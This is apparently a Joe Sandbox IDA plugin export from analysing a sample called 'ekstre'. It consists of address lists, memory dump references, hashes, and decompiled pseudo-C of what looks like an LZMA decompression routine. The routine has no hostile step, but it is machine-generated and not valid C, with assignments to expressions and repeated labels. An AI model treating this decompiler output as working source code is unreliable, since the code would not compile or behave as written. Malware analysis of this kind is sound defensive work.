0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														__ebx = __edx + 1;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
